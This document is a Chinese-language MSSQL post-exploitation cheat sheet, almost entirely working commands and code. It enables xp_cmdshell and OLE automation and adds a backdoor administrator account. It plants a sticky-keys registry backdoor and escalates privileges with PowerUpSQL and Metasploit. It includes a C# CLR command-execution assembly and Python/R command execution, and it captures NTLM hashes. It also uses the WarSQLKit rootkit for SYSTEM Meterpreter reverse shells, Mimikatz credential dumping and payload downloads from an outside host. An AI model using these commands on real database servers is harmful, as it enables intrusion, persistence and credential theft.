查询状态
>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 存在返回1
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec sp_configure 'xp_cmdshell',1;reconfigure;
exec master.dbo.xp_cmdshell 'ipconfig'
exec master..xp_cmdshell 'whoami'
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'
execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录
execute master..xp_dirtree 'c:',1 //只列c:\文件夹
execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件
查询状态
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE' 存在返回1
exec sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;
exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE WITH OVERRIDE;
执行命令无回显
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add>c:\\1.txt'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123/add'
删除文件
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token
复制文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'
移动文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\2.txt'
开启沙盒:
>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
执行:
>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
>Get-SQLServerLinkCrawl -Username sa -Password Password@ 1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Query "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;')"
查询当前用户trustworthy状态,trustworthy的值为 1,表示已激活。
>select name,is_trustworthy_on from sys.databases
也可使用PowerupSQL查询
>Import-Module .\PowerUpSQL.ps1
>Invoke-SQLAuditPrivTrustworthy -Username name -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Verbose
提权
>Import-Module .\Invoke-SqlServer-Escalate-Dbowner.psm1
>Invoke-SqlServer-Escalate-DbOwner -SqlUser name -SqlPass Password@1 -SqlServerInstance WIN-P83OS778EQK\SQLEXPRESS
或使用msf来提权
>use auxiliary/admin/mssql_escalate_dbowner
>set rhosts 192.168.1.146
>set username name
>set password Password@1
>exploit
提权成功后获取会话
>use exploit/windows/mssql/mssql_payload
>set rhosts 192.168.1.146
>set username name
>set password Password@1
>exploit
查看服务器是否启用
sp_configure 'external scripts enabled'
GO
当maximum,config_value,run_value为1时则确认启动
执行python
>EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("ipconfig"))'
执行R Script
>EXEC sp_execute_external_script
>@language=N'R',
>@script=N'OutputDataSet <- data.frame(system("cmd.exe /c ipconfig",intern=T))'
>WITH RESULT SETS (([cmd_out] text));
>GO
VS创建sql server数据库项目,选择目标平台和创建脚本.sql文件,修改目标框架和权限级别unsafe
创建SQL CLR C#存储过程,写入代码
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecCommand (string cmd)
{
// 在此处放置代码
SqlContext.Pipe.Send("Command is running, please wait.");
SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
}
public static string RunCommand(string filename,string arguments)
{
var process = new Process();
process.StartInfo.FileName = filename;
if (!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments = arguments;
}
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
var stdOutput = new StringBuilder();
process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
string stdError = null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
if (process.ExitCode == 0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
var message = new StringBuilder();
if (!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if (stdOutput.Length != 0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
}
return stdOutput.ToString();
}
}
启用MSSQL CLR
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
ALTER DATABASE master SET TRUSTWORTHY ON;
获取字节流
var byteStream =BitConverter.ToString(File.ReadAl1Bytes(@"c:\your.dll")).Replace("-","");
File.WriteAllText(@"C:\bytestream.txt",byteStream);
利用SQL语句导入程序集
CREATE ASSEMBLY [Database1]
AUTHORIZATION [dbo]
FROM 0x4d5a...[...]
WITH PERMISSION_SET = UNSAFE;
GO
创建存储过程
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
go
无文件落地执行命令
exec dbo.ExecCommand "whoami";
前提条件:
Machine Learning Services必须要在Python安装过程中选择
必须启用外部脚本
EXEC sp_configure 'external scripts enabled', 1
RECONFIGURE WITH OVERRIDE
重新启动数据库服务器
用户拥有执行任何外部脚本权限
MSSQL 2017加入了Microsoft机器学习服务,该服务允许通过MSSQL中sp_execute_external_script执行Python和R脚本
R脚本执行命令
sp_configure 'external scripts enabled'
GO
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe
/c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO
抓取Net-NTLM哈希
@script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")'
exec sp_execute_external_script
@language =N'Python',
@script=N'import sys
OutputDataSet = pandas.DataFrame([sys.version])'
WITH RESULT SETS ((python_version nvarchar(max)))
执行命令
exec sp_execute_external_script
@language =N'Python',
@script=N'import subprocess
p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE)
OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))
WarSQLKit.dll: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit/raw/master/WarSQLKit/bin/Debug/WarSQLKit.dll
WarSQLKit_Compressed.dll: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit/raw/master/WarSQLKit/bin/Debug/Confused/WarSQLKit.dll
WarSQLKitMinimal.dll: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit/raw/master/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dll
Meterpreter CSharp (C#) Shellcode: https://github.com/EPICROUTERSS/Build-Meterpreter-CSharp-Shellcode
Meterpreter CSharp(C#)Base64编码的Shellcode:https://github.com/EPICROUTERSS/Build-Encoded-Meterpreter-C-Shellcode
OSCMDEXEC_CLR: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_clr.sql
获取WarSQLKit字节流
var byteStream =BitConverter.ToString(File.ReadAl1Bytes(@"c:\WarSQLKit.dll")).Replace("-","");
File.WriteAllText(@"C:\bytestream.txt",byteStream);
导入
CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo]
FROM 0x4d5a...[...]
WITH PERMISSION_SET = UNSAFE;
GO
创建存储过程
CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](4000)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO
执行命令
EXEC sp_cmdExec 'whoami';
以NT AUTHORITY\SYSTEM权限执行Windows命令
EXEC sp_cmdExec 'whoami /RunSystemPriv';
以NT AUTHORITY\SYSTEM权限运行PowerShell命令
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';
生成一个以NT AUTHORITY\SYSTEM权限运行的X86 Meterpreter反向连接shell
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';
生成一个以NT AUTHORITY\SYSTEM权限运行的X64 Meterpreter反向连接shell
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';
生成一个以NT AUTHORITY\SYSTEM权限运行的X64 Meterpreter RC4反向连接shell
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'
RC4PASSWORD=warsql
生成一个以NT AUTHORITY\SYSTEM权限运行的X86 meterpreter_bind_tcp shell
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';
运行Mimikatz功能抓取密码
EXEC sp_cmdExec 'sp_Mimikatz';
获取Mimikatz日志
select * from WarSQLKitTemp
文件下载
EXEC sp_cmdExec 'sp_downloadFile http://test.com/file.exe C:\ProgramData\file.exe 300';
获取MSSQL Hash
EXEC sp_cmdExec 'sp_getSqlHash';
获取Windows版本
EXEC sp_cmdExec 'sp_getProduct';
获取可用的数据库
EXEC sp_cmdExec 'sp_getDatabases';
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'